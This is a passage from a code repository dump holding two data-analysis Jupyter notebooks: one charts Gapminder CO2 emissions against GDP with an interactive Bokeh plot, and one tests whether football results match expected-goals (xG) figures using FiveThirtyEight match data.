\n", 57 | "\n", 70 | "\n", 71 | " \n", 72 | " \n", 73 | " \n", 74 | " \n", 75 | " \n", 76 | " \n", 77 | " \n", 78 | " \n", 79 | " \n", 80 | " \n", 81 | " \n", 82 | " \n", 83 | " \n", 84 | " \n", 85 | " \n", 86 | " \n", 87 | " \n", 88 | " \n", 89 | " \n", 90 | " \n", 91 | " \n", 92 | " \n", 93 | " \n", 94 | " \n", 95 | " \n", 96 | " \n", 97 | " \n", 98 | " \n", 99 | " \n", 100 | " \n", 101 | " \n", 102 | " \n", 103 | " \n", 104 | " \n", 105 | " \n", 106 | " \n", 107 | " \n", 108 | " \n", 109 | " \n", 110 | " \n", 111 | " \n", 112 | " \n", 113 | " \n", 114 | " \n", 115 | " \n", 116 | " \n", 117 | " \n", 118 | " \n", 119 | " \n", 120 | " \n", 121 | " \n", 122 | " \n", 123 | " \n", 124 | " \n", 125 | " \n", 126 | " \n", 127 | " \n", 128 | " \n", 129 | " \n", 130 | " \n", 131 | " \n", 132 | " \n", 133 | " \n", 134 | " \n", 135 | " \n", 136 | " \n", 137 | " \n", 138 | " \n", 139 | " \n", 140 | " \n", 141 | "
CountryYearfertilitylifepopulationchild_mortalitygdpregion
0Afghanistan19647.67133.63910474903.0339.71182.0South Asia
1Afghanistan19657.67134.15210697983.0334.11182.0South Asia
2Afghanistan19667.67134.66210927724.0328.71168.0South Asia
3Afghanistan19677.67135.17011163656.0323.31173.0South Asia
4Afghanistan19687.67135.67411411022.0318.11187.0South Asia
\n", 142 | "
" 143 | ], 144 | "text/plain": [ 145 | " Country Year fertility life population child_mortality gdp \\\n", 146 | "0 Afghanistan 1964 7.671 33.639 10474903.0 339.7 1182.0 \n", 147 | "1 Afghanistan 1965 7.671 34.152 10697983.0 334.1 1182.0 \n", 148 | "2 Afghanistan 1966 7.671 34.662 10927724.0 328.7 1168.0 \n", 149 | "3 Afghanistan 1967 7.671 35.170 11163656.0 323.3 1173.0 \n", 150 | "4 Afghanistan 1968 7.671 35.674 11411022.0 318.1 1187.0 \n", 151 | "\n", 152 | " region \n", 153 | "0 South Asia \n", 154 | "1 South Asia \n", 155 | "2 South Asia \n", 156 | "3 South Asia \n", 157 | "4 South Asia " 158 | ] 159 | }, 160 | "execution_count": 4, 161 | "metadata": {}, 162 | "output_type": "execute_result" 163 | } 164 | ], 165 | "source": [ 166 | "gapminder = pd.read_csv('data/gapminder_tidy.csv')\n", 167 | "gapminder.head()" 168 | ] 169 | }, 170 | { 171 | "cell_type": "code", 172 | "execution_count": 21, 173 | "metadata": {}, 174 | "outputs": [ 175 | { 176 | "data": { 177 | "text/html": [ 178 | "
\n", 179 | "\n", 192 | "\n", 193 | " \n", 194 | " \n", 195 | " \n", 196 | " \n", 197 | " \n", 198 | " \n", 199 | " \n", 200 | " \n", 201 | " \n", 202 | " \n", 203 | " \n", 204 | " \n", 205 | " \n", 206 | " \n", 207 | " \n", 208 | " \n", 209 | " \n", 210 | " \n", 211 | " \n", 212 | " \n", 213 | " \n", 214 | " \n", 215 | " \n", 216 | " \n", 217 | " \n", 218 | " \n", 219 | " \n", 220 | " \n", 221 | " \n", 222 | " \n", 223 | " \n", 224 | " \n", 225 | " \n", 226 | " \n", 227 | " \n", 228 | " \n", 229 | " \n", 230 | " \n", 231 | " \n", 232 | " \n", 233 | " \n", 234 | " \n", 235 | " \n", 236 | " \n", 237 | " \n", 238 | " \n", 239 | " \n", 240 | " \n", 241 | " \n", 242 | " \n", 243 | " \n", 244 | " \n", 245 | " \n", 246 | " \n", 247 | " \n", 248 | " \n", 249 | " \n", 250 | " \n", 251 | " \n", 252 | " \n", 253 | " \n", 254 | " \n", 255 | " \n", 256 | " \n", 257 | " \n", 258 | " \n", 259 | " \n", 260 | " \n", 261 | " \n", 262 | " \n", 263 | " \n", 264 | " \n", 265 | " \n", 266 | " \n", 267 | " \n", 268 | " \n", 269 | " \n", 270 | " \n", 271 | " \n", 272 | " \n", 273 | " \n", 274 | " \n", 275 | " \n", 276 | " \n", 277 | " \n", 278 | " \n", 279 | " \n", 280 | " \n", 281 | " \n", 282 | " \n", 283 | " \n", 284 | " \n", 285 | " \n", 286 | " \n", 287 | " \n", 288 | " \n", 289 | " \n", 290 | " \n", 291 | " \n", 292 | " \n", 293 | " \n", 294 | " \n", 295 | " \n", 296 | " \n", 297 | " \n", 298 | " \n", 299 | " \n", 300 | " \n", 301 | " \n", 302 | " \n", 303 | " \n", 304 | " \n", 305 | " \n", 306 | " \n", 307 | " \n", 308 | " \n", 309 | " \n", 310 | " \n", 311 | " \n", 312 | " \n", 313 | " \n", 314 | " \n", 315 | " \n", 316 | " \n", 317 | " \n", 318 | " \n", 319 | " \n", 320 | " \n", 321 | " \n", 322 | " \n", 323 | " \n", 324 | " \n", 325 | " \n", 326 | " \n", 327 | " \n", 328 | " \n", 329 | " \n", 330 | " \n", 331 | " \n", 332 | " \n", 333 | " \n", 334 | " \n", 335 | " \n", 336 | " \n", 337 | " \n", 338 | " \n", 339 | " \n", 340 | " \n", 341 | "
country180018011802180318041805180618071808...200620072008200920102011201220132014region
0AfghanistanNaNNaNNaNNaNNaNNaNNaNNaNNaN...0.06370.08540.1540.2420.2940.4120.350.3160.299South Asia
1AlbaniaNaNNaNNaNNaNNaNNaNNaNNaNNaN...1.28001.30001.4601.4801.5601.7901.681.7301.960Europe & Central Asia
2AlgeriaNaNNaNNaNNaNNaNNaNNaNNaNNaN...2.99003.19003.1603.4203.3003.2903.463.5103.720Middle East & North Africa
3AngolaNaNNaNNaNNaNNaNNaNNaNNaNNaN...1.10001.20001.1801.2301.2401.2501.331.2501.290Sub-Saharan Africa
4Antigua and BarbudaNaNNaNNaNNaNNaNNaNNaNNaNNaN...4.91005.14005.1905.4505.5405.3605.425.3605.380America
\n", 342 | "

5 rows × 217 columns

\n", 343 | "
" 344 | ], 345 | "text/plain": [ 346 | " country 1800 1801 1802 1803 1804 1805 1806 1807 1808 \\\n", 347 | "0 Afghanistan NaN NaN NaN NaN NaN NaN NaN NaN NaN \n", 348 | "1 Albania NaN NaN NaN NaN NaN NaN NaN NaN NaN \n", 349 | "2 Algeria NaN NaN NaN NaN NaN NaN NaN NaN NaN \n", 350 | "3 Angola NaN NaN NaN NaN NaN NaN NaN NaN NaN \n", 351 | "4 Antigua and Barbuda NaN NaN NaN NaN NaN NaN NaN NaN NaN \n", 352 | "\n", 353 | " ... 2006 2007 2008 2009 2010 2011 \\\n", 354 | "0 ... 0.0637 0.0854 0.154 0.242 0.294 0.412 \n", 355 | "1 ... 1.2800 1.3000 1.460 1.480 1.560 1.790 \n", 356 | "2 ... 2.9900 3.1900 3.160 3.420 3.300 3.290 \n", 357 | "3 ... 1.1000 1.2000 1.180 1.230 1.240 1.250 \n", 358 | "4 ... 4.9100 5.1400 5.190 5.450 5.540 5.360 \n", 359 | "\n", 360 | " 2012 2013 2014 region \n", 361 | "0 0.35 0.316 0.299 South Asia \n", 362 | "1 1.68 1.730 1.960 Europe & Central Asia \n", 363 | "2 3.46 3.510 3.720 Middle East & North Africa \n", 364 | "3 1.33 1.250 1.290 Sub-Saharan Africa \n", 365 | "4 5.42 5.360 5.380 America \n", 366 | "\n", 367 | "[5 rows x 217 columns]" 368 | ] 369 | }, 370 | "execution_count": 21, 371 | "metadata": {}, 372 | "output_type": "execute_result" 373 | } 374 | ], 375 | "source": [ 376 | "df = gapminder[['Country', 'region']].drop_duplicates()\n", 377 | "data_with_regions = pd.merge(data, df, left_on='country', right_on='Country', how='inner')\n", 378 | "data_with_regions = data_with_regions.drop('Country', axis='columns')\n", 379 | "\n", 380 | "data_with_regions.head()" 381 | ] 382 | }, 383 | { 384 | "cell_type": "code", 385 | "execution_count": 22, 386 | "metadata": {}, 387 | "outputs": [ 388 | { 389 | "data": { 390 | "text/html": [ 391 | "
\n", 392 | "\n", 405 | "\n", 406 | " \n", 407 | " \n", 408 | " \n", 409 | " \n", 410 | " \n", 411 | " \n", 412 | " \n", 413 | " \n", 414 | " \n", 415 | " \n", 416 | " \n", 417 | " \n", 418 | " \n", 419 | " \n", 420 | " \n", 421 | " \n", 422 | " \n", 423 | " \n", 424 | " \n", 425 | " \n", 426 | " \n", 427 | " \n", 428 | " \n", 429 | " \n", 430 | " \n", 431 | " \n", 432 | " \n", 433 | " \n", 434 | " \n", 435 | " \n", 436 | " \n", 437 | " \n", 438 | " \n", 439 | " \n", 440 | " \n", 441 | " \n", 442 | " \n", 443 | " \n", 444 | " \n", 445 | " \n", 446 | " \n", 447 | " \n", 448 | " \n", 449 | " \n", 450 | " \n", 451 | " \n", 452 | "
countryregionyearco2
0AfghanistanSouth Asia1800NaN
1AlbaniaEurope & Central Asia1800NaN
2AlgeriaMiddle East & North Africa1800NaN
3AngolaSub-Saharan Africa1800NaN
4Antigua and BarbudaAmerica1800NaN
\n", 453 | "
" 454 | ], 455 | "text/plain": [ 456 | " country region year co2\n", 457 | "0 Afghanistan South Asia 1800 NaN\n", 458 | "1 Albania Europe & Central Asia 1800 NaN\n", 459 | "2 Algeria Middle East & North Africa 1800 NaN\n", 460 | "3 Angola Sub-Saharan Africa 1800 NaN\n", 461 | "4 Antigua and Barbuda America 1800 NaN" 462 | ] 463 | }, 464 | "execution_count": 22, 465 | "metadata": {}, 466 | "output_type": "execute_result" 467 | } 468 | ], 469 | "source": [ 470 | "new_df = pd.melt(data_with_regions, id_vars=['country', 'region'])\n", 471 | "columns = ['country', 'region', 'year', 'co2']\n", 472 | "new_df.columns = columns\n", 473 | "new_df['year'] = new_df['year'].astype('int64')\n", 474 | "new_df.head()" 475 | ] 476 | }, 477 | { 478 | "cell_type": "code", 479 | "execution_count": 24, 480 | "metadata": {}, 481 | "outputs": [ 482 | { 483 | "data": { 484 | "text/html": [ 485 | "
\n", 486 | "\n", 499 | "\n", 500 | " \n", 501 | " \n", 502 | " \n", 503 | " \n", 504 | " \n", 505 | " \n", 506 | " \n", 507 | " \n", 508 | " \n", 509 | " \n", 510 | " \n", 511 | " \n", 512 | " \n", 513 | " \n", 514 | " \n", 515 | " \n", 516 | " \n", 517 | " \n", 518 | " \n", 519 | " \n", 520 | " \n", 521 | " \n", 522 | " \n", 523 | " \n", 524 | " \n", 525 | " \n", 526 | " \n", 527 | " \n", 528 | " \n", 529 | " \n", 530 | " \n", 531 | " \n", 532 | " \n", 533 | " \n", 534 | " \n", 535 | " \n", 536 | " \n", 537 | " \n", 538 | " \n", 539 | " \n", 540 | " \n", 541 | " \n", 542 | " \n", 543 | " \n", 544 | " \n", 545 | " \n", 546 | "
countryregionyearco2
28372AfghanistanSouth Asia19640.0863
28545AfghanistanSouth Asia19650.1010
28718AfghanistanSouth Asia19660.1080
28891AfghanistanSouth Asia19670.1240
29064AfghanistanSouth Asia19680.1160
\n", 547 | "
" 548 | ], 549 | "text/plain": [ 550 | " country region year co2\n", 551 | "28372 Afghanistan South Asia 1964 0.0863\n", 552 | "28545 Afghanistan South Asia 1965 0.1010\n", 553 | "28718 Afghanistan South Asia 1966 0.1080\n", 554 | "28891 Afghanistan South Asia 1967 0.1240\n", 555 | "29064 Afghanistan South Asia 1968 0.1160" 556 | ] 557 | }, 558 | "execution_count": 24, 559 | "metadata": {}, 560 | "output_type": "execute_result" 561 | } 562 | ], 563 | "source": [ 564 | "upd_new_df = new_df[new_df['year'].astype('int64') > 1963]\n", 565 | "upd_new_df = upd_new_df.sort_values(by=['country', 'year'])\n", 566 | "upd_new_df.head()" 567 | ] 568 | }, 569 | { 570 | "cell_type": "code", 571 | "execution_count": 25, 572 | "metadata": {}, 573 | "outputs": [ 574 | { 575 | "name": "stdout", 576 | "output_type": "stream", 577 | "text": [ 578 | "\n", 579 | "RangeIndex: 10111 entries, 0 to 10110\n", 580 | "Data columns (total 3 columns):\n", 581 | "country 10111 non-null object\n", 582 | "year 10111 non-null int64\n", 583 | "gdp 9000 non-null float64\n", 584 | "dtypes: float64(1), int64(1), object(1)\n", 585 | "memory usage: 237.1+ KB\n" 586 | ] 587 | } 588 | ], 589 | "source": [ 590 | "df_gdp = gapminder[['Country', 'Year', 'gdp']]\n", 591 | "df_gdp.columns = ['country', 'year', 'gdp']\n", 592 | "df_gdp.info()" 593 | ] 594 | }, 595 | { 596 | "cell_type": "code", 597 | "execution_count": 26, 598 | "metadata": {}, 599 | "outputs": [ 600 | { 601 | "data": { 602 | "text/html": [ 603 | "
\n", 604 | "\n", 617 | "\n", 618 | " \n", 619 | " \n", 620 | " \n", 621 | " \n", 622 | " \n", 623 | " \n", 624 | " \n", 625 | " \n", 626 | " \n", 627 | " \n", 628 | " \n", 629 | " \n", 630 | " \n", 631 | " \n", 632 | " \n", 633 | " \n", 634 | " \n", 635 | " \n", 636 | " \n", 637 | " \n", 638 | " \n", 639 | " \n", 640 | " \n", 641 | " \n", 642 | " \n", 643 | " \n", 644 | " \n", 645 | " \n", 646 | " \n", 647 | " \n", 648 | " \n", 649 | " \n", 650 | " \n", 651 | " \n", 652 | " \n", 653 | " \n", 654 | " \n", 655 | " \n", 656 | " \n", 657 | " \n", 658 | " \n", 659 | " \n", 660 | " \n", 661 | " \n", 662 | " \n", 663 | " \n", 664 | " \n", 665 | " \n", 666 | " \n", 667 | " \n", 668 | " \n", 669 | " \n", 670 | "
countryregionyearco2gdp
0AfghanistanSouth Asia19640.08631182.0
1AfghanistanSouth Asia19650.10101182.0
2AfghanistanSouth Asia19660.10801168.0
3AfghanistanSouth Asia19670.12401173.0
4AfghanistanSouth Asia19680.11601187.0
\n", 671 | "
" 672 | ], 673 | "text/plain": [ 674 | " country region year co2 gdp\n", 675 | "0 Afghanistan South Asia 1964 0.0863 1182.0\n", 676 | "1 Afghanistan South Asia 1965 0.1010 1182.0\n", 677 | "2 Afghanistan South Asia 1966 0.1080 1168.0\n", 678 | "3 Afghanistan South Asia 1967 0.1240 1173.0\n", 679 | "4 Afghanistan South Asia 1968 0.1160 1187.0" 680 | ] 681 | }, 682 | "execution_count": 26, 683 | "metadata": {}, 684 | "output_type": "execute_result" 685 | } 686 | ], 687 | "source": [ 688 | "final_df = pd.merge(upd_new_df, df_gdp, on=['country', 'year'], how='left')\n", 689 | "final_df = final_df.dropna()\n", 690 | "final_df.head()" 691 | ] 692 | }, 693 | { 694 | "cell_type": "code", 695 | "execution_count": 27, 696 | "metadata": {}, 697 | "outputs": [], 698 | "source": [ 699 | "# Creating visualization app with Bokeh.io\n", 700 | "regions_list = final_df.region.unique().tolist()\n", 701 | "color_mapper = CategoricalColorMapper(factors=regions_list, palette=Spectral6)" 702 | ] 703 | }, 704 | { 705 | "cell_type": "code", 706 | "execution_count": 28, 707 | "metadata": {}, 708 | "outputs": [], 709 | "source": [ 710 | "# Make the ColumnDataSource: source\n", 711 | "source = ColumnDataSource(data={\n", 712 | " 'x': final_df.gdp[final_df['year'] == 1964],\n", 713 | " 'y': final_df.co2[final_df['year'] == 1964],\n", 714 | " 'country': final_df.country[final_df['year'] == 1964],\n", 715 | " 'region': final_df.region[final_df['year'] == 1964],\n", 716 | "})" 717 | ] 718 | }, 719 | { 720 | "cell_type": "code", 721 | "execution_count": 29, 722 | "metadata": {}, 723 | "outputs": [], 724 | "source": [ 725 | "# Save the minimum and maximum values of the fertility column: xmin, xmax\n", 726 | "xmin, xmax = min(final_df.gdp), max(final_df.gdp)\n", 727 | "\n", 728 | "# Save the minimum and maximum values of the life expectancy column: ymin, ymax\n", 729 | "ymin, ymax = min(final_df.co2), max(final_df.co2)" 730 | ] 731 | }, 732 | { 733 | "cell_type": "code", 734 | "execution_count": 30, 735 | "metadata": {}, 736 | "outputs": [], 737 | "source": [ 738 | "# Create the figure: plot\n", 739 | "plot = figure(title='Gapminder Data for 1964', plot_height=400, plot_width=700,\n", 740 | " x_range=(xmin, xmax), y_range=(ymin, ymax))\n", 741 | "\n", 742 | "# Add circle glyphs to the plot\n", 743 | "plot.circle(x='x', y='y', fill_alpha=0.8, source=source, legend='region',\n", 744 | " color=dict(field='region', transform=color_mapper))\n", 745 | "\n", 746 | "# Set the legend.location attribute of the plot to 'top_right'\n", 747 | "plot.legend.location = 'top_right'\n", 748 | "\n", 749 | "# Set the x-axis label\n", 750 | "plot.xaxis.axis_label = 'GDP'\n", 751 | "\n", 752 | "# Set the y-axis label\n", 753 | "plot.yaxis.axis_label = 'CO2 emissions (tonnes per person)'" 754 | ] 755 | }, 756 | { 757 | "cell_type": "code", 758 | "execution_count": 31, 759 | "metadata": {}, 760 | "outputs": [], 761 | "source": [ 762 | "def update_plot(attr, old, new):\n", 763 | " # set the `yr` name to `slider.value` and `source.data = new_data`\n", 764 | " yr = slider.value\n", 765 | "\n", 766 | " new_data = {\n", 767 | " 'x': final_df.gdp[final_df['year'] == yr],\n", 768 | " 'y': final_df.co2[final_df['year'] == yr],\n", 769 | " 'country': final_df.country[final_df['year'] == yr],\n", 770 | " 'region': final_df.region[final_df['year'] == yr],\n", 771 | " }\n", 772 | " source.data = new_data\n", 773 | "\n", 774 | " # Add title to figure: plot.title.text\n", 775 | " plot.title.text = 'Gapminder data for %d' % yr" 776 | ] 777 | }, 778 | { 779 | 
"cell_type": "code", 780 | "execution_count": 32, 781 | "metadata": {}, 782 | "outputs": [], 783 | "source": [ 784 | "# Make a slider object: slider\n", 785 | "slider = Slider(start=1964, end=2013, step=1, value=1964, title='Year')\n", 786 | "\n", 787 | "# Attach the callback to the 'value' property of slider\n", 788 | "slider.on_change('value', update_plot)" 789 | ] 790 | }, 791 | { 792 | "cell_type": "code", 793 | "execution_count": 33, 794 | "metadata": {}, 795 | "outputs": [], 796 | "source": [ 797 | "# Create a HoverTool: hover\n", 798 | "hover = HoverTool(tooltips=[('Country', '@country')])\n", 799 | "\n", 800 | "# Add the HoverTool to the plot\n", 801 | "plot.add_tools(hover)" 802 | ] 803 | }, 804 | { 805 | "cell_type": "code", 806 | "execution_count": 34, 807 | "metadata": {}, 808 | "outputs": [], 809 | "source": [ 810 | "# Make a row layout of widgetbox(slider) and plot and add it to the current document\n", 811 | "layout = row(widgetbox(slider), plot)\n", 812 | "curdoc().add_root(layout)" 813 | ] 814 | } 815 | ], 816 | "metadata": { 817 | "kernelspec": { 818 | "display_name": "Python 3", 819 | "language": "python", 820 | "name": "python3" 821 | }, 822 | "language_info": { 823 | "codemirror_mode": { 824 | "name": "ipython", 825 | "version": 3 826 | }, 827 | "file_extension": ".py", 828 | "mimetype": "text/x-python", 829 | "name": "python", 830 | "nbconvert_exporter": "python", 831 | "pygments_lexer": "ipython3", 832 | "version": "3.6.3" 833 | } 834 | }, 835 | "nbformat": 4, 836 | "nbformat_minor": 2 837 | } 838 | -------------------------------------------------------------------------------- /is_football_fair.ipynb: -------------------------------------------------------------------------------- 1 | { 2 | "cells": [ 3 | { 4 | "cell_type": "markdown", 5 | "metadata": {}, 6 | "source": [ 7 | "# Is Football Fair?\n", 8 | "\n", 9 | "Good question, isn't it? Seeing how Real Madrid wins their Champions League trophies (yes, I am a Barcelona fan) one might think it is not fair at all. Also, knowing that the game is low-scoring and luck plays quite a role in it, one might get to the same conclusion - the game isn't fair at all.\n", 10 | "\n", 11 | "But what do we mean by calling a game fair? In the end, if the team won, they fought for it, they deserved the victory and this victory is fair for them. From the other side, we have seen a lot of lucky goals or unfortunate errors that led to goals that made a decisive turn in the game. If favourite always wins - is it fair? Probably. But it is not that fun. From the other side, when outsider wins, is this fair?\n", 12 | "\n", 13 | "I guess the right answer will always be \"it depends\". It depends on an effort that a team put into their victory. If the team plays well and wins it is fair, correct? If the team can't even make a shot on the opponent's goal and loses, it is also fair, correct?\n", 14 | "\n", 15 | "Another story is when a team plays incredibly well, creates moments, attacks. but cannot score, while the opponent makes one shot, scores one goal and wins. This is totally unfair. These days we have the possibility to evaluate an effort that team made in every particular game and see if th result of that effort was fair.\n", 16 | "\n", 17 | "xG metric shows us an expected goal value for every shot in the game and usually it is a great indicator of an amount of moments the team created to score a goal. \n", 18 | "\n", 19 | "I have found a dataset with xG metrics for every game in the last few years in 40 different football leagues. 
More about where and how I got that data [here](https://medium.com/geekculture/scraping-xg-data-for-almost-any-league-in-the-world-9e9ddcc2a339?sk=3e422d47b778038eaab6bab7150dad7b).\n", 20 | "\n", 21 | "\n", 22 | "## Plan of action\n", 23 | "So, if the team created enough moments to score 2 goals and scored 2 - it is fair. If their opponent created moments for 1 goal and scored 1, the final result should've been 2-1 and the first team should have won. That's what we will call fair. We have to calculate the number of games that ended up 'fairly' - if the xG of one team is bigger than the xG of another, the result has to be the victory of the first team. The same goes for draws - if both teams created moments for 1 goal each, then a draw is a fair result.\n", 24 | "\n", 25 | "*Note:* Obviously, the timing of goals matters in football, as does who scores first, and many, many other factors. I am not pretending to be the judge of fairness, just taking a simple general look into data for a lot of games to see some basic trends.\n", 26 | "\n", 27 | "In a perfect and fair world, if we were to compare xG results with actual results, the agreement should be 100%, which means that all the games that ended up with one result or another based on xG, ended up the same in reality. Also, in such a world unicorns could have been possible.\n", 28 | "\n", 29 | "Let's assume that if 90% of the games won/drawn/lost by xG in reality ended up with the same result, we can call football fair. This number, 90%, is taken out of nothing and is subject to discussion. Also, probably, it might make sense to calculate this 'coefficient of fairness' in basketball and then apply it to football. As basketball is a high-scoring game, the influence of luck is quite reduced there, meaning that normally the stronger team will win. Finding out the percentage of games that end up with xg_result=actual_result will create a benchmark for this 'coefficient of fairness'. Maybe that's a topic for the next article. At the moment let's use the 90% benchmark.\n" 30 | ] 31 | }, 32 | { 33 | "cell_type": "markdown", 34 | "metadata": {}, 35 | "source": [ 36 | "## Process" 37 | ] 38 | }, 39 | { 40 | "cell_type": "markdown", 41 | "metadata": {}, 42 | "source": [ 43 | "Let's import standard data manipulation libraries and get our data." 44 | ] 45 | }, 46 | { 47 | "cell_type": "code", 48 | "execution_count": 14, 49 | "metadata": {}, 50 | "outputs": [], 51 | "source": [ 52 | "import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\n", 53 | "import numpy as np\n", 54 | "import matplotlib.pyplot as plt" 55 | ] 56 | }, 57 | { 58 | "cell_type": "code", 59 | "execution_count": 15, 60 | "metadata": {}, 61 | "outputs": [], 62 | "source": [ 63 | "URL = 'https://projects.fivethirtyeight.com/soccer-api/club/spi_matches.csv'\n", 64 | "\n", 65 | "data = pd.read_csv(URL)" 66 | ] 67 | }, 68 | { 69 | "cell_type": "markdown", 70 | "metadata": {}, 71 | "source": [ 72 | "Checking the columns in our dataset." 
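As a preview of the comparison described in the plan, here is a minimal sketch using this FiveThirtyEight file's `score1`, `score2`, `xg1` and `xg2` columns, with xG rounded to whole goals as discussed (the notebook builds the same logic step by step below):

```python
# Derive a 1/X/2 result from actual goals and from rounded xG, then measure agreement.
# Assumes `pd`, `np` and `data` (the spi_matches.csv table) as loaded above.
games = data.dropna(subset=['score1', 'score2', 'xg1', 'xg2'])

def to_result(home, away):
    return np.where(home > away, '1', np.where(home < away, '2', 'X'))

actual = to_result(games['score1'], games['score2'])
by_xg = to_result(games['xg1'].round(0), games['xg2'].round(0))
fair_share = (actual == by_xg).mean()
print('Games where the xG result matches the actual result: {:.1%}'.format(fair_share))
```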
73 | ] 74 | }, 75 | { 76 | "cell_type": "code", 77 | "execution_count": 16, 78 | "metadata": {}, 79 | "outputs": [ 80 | { 81 | "data": { 82 | "text/plain": [ 83 | "Index(['season', 'date', 'league_id', 'league', 'team1', 'team2', 'spi1',\n", 84 | " 'spi2', 'prob1', 'prob2', 'probtie', 'proj_score1', 'proj_score2',\n", 85 | " 'importance1', 'importance2', 'score1', 'score2', 'xg1', 'xg2', 'nsxg1',\n", 86 | " 'nsxg2', 'adj_score1', 'adj_score2'],\n", 87 | " dtype='object')" 88 | ] 89 | }, 90 | "execution_count": 16, 91 | "metadata": {}, 92 | "output_type": "execute_result" 93 | } 94 | ], 95 | "source": [ 96 | "data.columns" 97 | ] 98 | }, 99 | { 100 | "cell_type": "markdown", 101 | "metadata": {}, 102 | "source": [ 103 | "We won't need the majority of this columns, so we select only those we are interested in: 'season', 'date', 'league', 'team1', 'team2', 'score1', 'score2', 'xg1', 'xg2'. At the same time we drop all the rows with null values in this modified dataset as we cannot use them at all." 104 | ] 105 | }, 106 | { 107 | "cell_type": "code", 108 | "execution_count": 17, 109 | "metadata": {}, 110 | "outputs": [], 111 | "source": [ 112 | "# championship = data[data['league'] == 'English League Championship']\n", 113 | "data = data[['season', 'date', 'league', 'team1', 'team2', 'score1', 'score2', 'xg1', 'xg2']]\n", 114 | "data = data.dropna()" 115 | ] 116 | }, 117 | { 118 | "cell_type": "markdown", 119 | "metadata": {}, 120 | "source": [ 121 | "`describe()` method is an excellent way to quickly get an idea of what kind of data we have here. As we can see, the analysis will be based on 29659 games from different countries and different levels of leagues, with the data from 2016 to 2022. We can also see that record amount of goals is 13 during this period of time, while the maximum xG is 8.27 (and it has yet to be confirmed if that happened in the same game)." 122 | ] 123 | }, 124 | { 125 | "cell_type": "code", 126 | "execution_count": 18, 127 | "metadata": {}, 128 | "outputs": [ 129 | { 130 | "data": { 131 | "text/html": [ 132 | "
\n", 133 | "\n", 146 | "\n", 147 | " \n", 148 | " \n", 149 | " \n", 150 | " \n", 151 | " \n", 152 | " \n", 153 | " \n", 154 | " \n", 155 | " \n", 156 | " \n", 157 | " \n", 158 | " \n", 159 | " \n", 160 | " \n", 161 | " \n", 162 | " \n", 163 | " \n", 164 | " \n", 165 | " \n", 166 | " \n", 167 | " \n", 168 | " \n", 169 | " \n", 170 | " \n", 171 | " \n", 172 | " \n", 173 | " \n", 174 | " \n", 175 | " \n", 176 | " \n", 177 | " \n", 178 | " \n", 179 | " \n", 180 | " \n", 181 | " \n", 182 | " \n", 183 | " \n", 184 | " \n", 185 | " \n", 186 | " \n", 187 | " \n", 188 | " \n", 189 | " \n", 190 | " \n", 191 | " \n", 192 | " \n", 193 | " \n", 194 | " \n", 195 | " \n", 196 | " \n", 197 | " \n", 198 | " \n", 199 | " \n", 200 | " \n", 201 | " \n", 202 | " \n", 203 | " \n", 204 | " \n", 205 | " \n", 206 | " \n", 207 | " \n", 208 | " \n", 209 | " \n", 210 | " \n", 211 | " \n", 212 | " \n", 213 | " \n", 214 | " \n", 215 | " \n", 216 | " \n", 217 | " \n", 218 | " \n", 219 | " \n", 220 | " \n", 221 | " \n", 222 | " \n", 223 | "
seasonscore1score2xg1xg2
count29659.0029659.0029659.0029659.0029659.00
mean2018.941.521.191.491.19
std1.641.271.140.830.74
min2016.000.000.000.000.00
25%2018.001.000.000.880.63
50%2019.001.001.001.361.05
75%2020.002.002.001.961.59
max2022.0010.0013.007.078.27
\n", 224 | "
" 225 | ], 226 | "text/plain": [ 227 | " season score1 score2 xg1 xg2\n", 228 | "count 29659.00 29659.00 29659.00 29659.00 29659.00\n", 229 | "mean 2018.94 1.52 1.19 1.49 1.19\n", 230 | "std 1.64 1.27 1.14 0.83 0.74\n", 231 | "min 2016.00 0.00 0.00 0.00 0.00\n", 232 | "25% 2018.00 1.00 0.00 0.88 0.63\n", 233 | "50% 2019.00 1.00 1.00 1.36 1.05\n", 234 | "75% 2020.00 2.00 2.00 1.96 1.59\n", 235 | "max 2022.00 10.00 13.00 7.07 8.27" 236 | ] 237 | }, 238 | "execution_count": 18, 239 | "metadata": {}, 240 | "output_type": "execute_result" 241 | } 242 | ], 243 | "source": [ 244 | "data.describe().round(2)" 245 | ] 246 | }, 247 | { 248 | "cell_type": "markdown", 249 | "metadata": {}, 250 | "source": [ 251 | "Well, OK. That happened in the same game." 252 | ] 253 | }, 254 | { 255 | "cell_type": "code", 256 | "execution_count": 19, 257 | "metadata": {}, 258 | "outputs": [ 259 | { 260 | "data": { 261 | "text/html": [ 262 | "
\n", 263 | "\n", 276 | "\n", 277 | " \n", 278 | " \n", 279 | " \n", 280 | " \n", 281 | " \n", 282 | " \n", 283 | " \n", 284 | " \n", 285 | " \n", 286 | " \n", 287 | " \n", 288 | " \n", 289 | " \n", 290 | " \n", 291 | " \n", 292 | " \n", 293 | " \n", 294 | " \n", 295 | " \n", 296 | " \n", 297 | " \n", 298 | " \n", 299 | " \n", 300 | " \n", 301 | " \n", 302 | " \n", 303 | " \n", 304 | " \n", 305 | "
seasondateleagueteam1team2score1score2xg1xg2
3566220202020-10-24Dutch EredivisieVVV VenloAjax0.013.00.238.27
\n", 306 | "
" 307 | ], 308 | "text/plain": [ 309 | " season date league team1 team2 score1 score2 \\\n", 310 | "35662 2020 2020-10-24 Dutch Eredivisie VVV Venlo Ajax 0.0 13.0 \n", 311 | "\n", 312 | " xg1 xg2 \n", 313 | "35662 0.23 8.27 " 314 | ] 315 | }, 316 | "execution_count": 19, 317 | "metadata": {}, 318 | "output_type": "execute_result" 319 | } 320 | ], 321 | "source": [ 322 | "data[data['xg2'] > 8]" 323 | ] 324 | }, 325 | { 326 | "cell_type": "markdown", 327 | "metadata": {}, 328 | "source": [ 329 | "As dataset do not give us a column `'result'` we will calculate it on our own. The same will be done for the column `'xg_result'` only with a little tweak - rounding to the integer, because without it the draws are impossible. Yes, rounding may distort a result somehow, but as was stated before, this article is not pretending to be published in science journal, just amateur playing around with numbers. \n", 330 | "\n", 331 | "To create these columns `np.select` is a perfect tool for the job. It's kinda case-when statement." 332 | ] 333 | }, 334 | { 335 | "cell_type": "code", 336 | "execution_count": 20, 337 | "metadata": {}, 338 | "outputs": [], 339 | "source": [ 340 | "conditions = [\n", 341 | " (data['score1'] > data['score2']),\n", 342 | " (data['score1'] == data['score2']),\n", 343 | " (data['score1'] < data['score2'])\n", 344 | "]\n", 345 | "values = ['1', 'X', '2'] # home_win, draw, away_win\n", 346 | "data['result'] = np.select(conditions, values)" 347 | ] 348 | }, 349 | { 350 | "cell_type": "code", 351 | "execution_count": 21, 352 | "metadata": {}, 353 | "outputs": [], 